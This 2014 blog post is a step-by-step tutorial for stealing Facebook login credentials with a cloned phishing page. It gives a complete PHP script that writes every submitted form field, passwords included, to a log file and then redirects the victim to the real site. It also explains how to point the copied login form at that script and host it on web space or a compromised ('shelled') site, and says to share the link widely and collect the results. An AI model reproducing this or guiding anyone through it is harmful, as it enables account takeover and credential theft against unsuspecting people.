Sunday, June 1, 2014

Hack a friend facebook account (THE EASY WAY)

How to hack people Facebook account

what you need
a web-hosting, a php web shell and a brain.

browse to facebook.com login page in your browser, when the page finish loading, right click on anywhere on the page and click on "view page source", it will show the source code of the page, copy all the codes and paste them in a new notepad, name the notepad "login", then open a new folder on your computer Desktop and name it facebook, move the text document named login to the newly created folder, create another text document and name it "phish" and copy and paste the following code inside and save it

<?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value)
 {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

create another text document in the same folder and name it "log.txt" and leave it blank.
 After that open the notepad with the source code and press CONTROL + F "CTRL + F" key on your keyboard, it will show a small dialogue box where you can search for anything in the document, type "action=" without the quote and click find next till you find the action keyword that has something with login, in the case of facebook it will be something like the text below,

><form id="login_form" action="https://www.facebook.com/login.php?login_attempt=1"

replace the "https://www.facebook.com/login.php?login_attempt=1 it with" "phish.php" without quote so that it will look like the code below

><form id="login_form" action="phish.php"

then save it, so you will now have a document in the folder name facebook, so its time to rename the login.txt document to login.htm.

NOTE: if after renaming the text document to login.html it icon does not change to either chrome of firefox or the icon of any browser installed on your computer, and it appear to be something like login.html.txt, that means you need to changes to how your computer manage system file extension, you can comment below and i will get back to you or made my next tutorial on how to change file extension

If you are successful with all the steps above then you can continue to upload the folder to your web hosting or your shelled website. then share the link with as many people as possible, check the log.txt document for results.

No comments:

Post a Comment